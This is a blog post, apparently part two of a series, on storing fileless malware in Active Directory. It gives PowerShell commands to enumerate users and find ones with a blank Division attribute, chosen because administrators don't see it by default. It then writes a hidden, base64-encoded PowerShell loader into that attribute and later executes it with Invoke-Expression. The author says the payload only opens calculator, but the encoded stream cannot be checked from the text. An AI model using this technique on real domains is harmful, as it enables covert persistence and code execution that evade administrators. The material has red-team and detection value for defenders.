Fileless Malware Storage: Active Directory– 2 of 4

In my last post, I spoke on the use of the Registry to store malicious code to call upon at a later time. In this post, I’ll discuss using Active Directory to store code.

Essentially, Active Directory is a hierarchical structure that stores information about objects on the network, particularly directory data. An example being user accounts, including their names, passwords, phone numbers, and so on. In all, there are approximately 60 available properties for an object that can be input with data. It is the data input capability for these properties that we will use to store our code. It will, however, require elevated rights to write to these properties and afterward, any domain user can query the properties through the command line with dsquery or PowerShell using the Active Directory module.

Using the PowerShell method, we’d likely find ourselves doing one or a few of the below commands in order to find a suitable user. We’d also be taking note of the available properties for us to use.

# Returns all users and every property 
Get-ADUser -filter * -property *

# Returns the first user and all of their properties
Get-ADuser - filter * -property * | select-object * -first 1

# Returns a particular user and all of their properties
Get-ADUser -filter {name -eq "< NAME OF USER >"} -properties *

With so many properties available, you may be wondering which one is the best to use. Well, the Division property is a great choice. The reason for that is because when an admin looks at a user’s account in Active Directory Users and Computers (ADUC), the Division property is not shown by default. With that being the case, it is unlikely it would be discovered that there is code being stored there. Knowing that we should now search for a user whose Division property is blank, which we can with the below command.

Get-ADuser -filter * -property * | where-object{$_.division -eq $null} | select-object name

Anyone from the returned list doesn’t have the property set, which makes them a suitable candidate for us to use. We can store our code using the below. My base64 code will do nothing more than execute calculator.

$Encoded = 'powershell -NoP -NonI -W hidden -E "cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAZQA3ADkANwBmADMASgBpAFQAagBJAHYARgB3AEEAPQAnACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkA"'

Get-ADuser -filter {name -eq "< NAME OF USER >"} -properties * | Set-ADuser -division $Encoded

When the time comes to execute the code that is stored, we can simply read the property, decode the code, and execute it as shown below.

$Data = (get-aduser -filter {name -eq "< NAME OF USER >"} -properties division).division

Invoke-Expression ($data)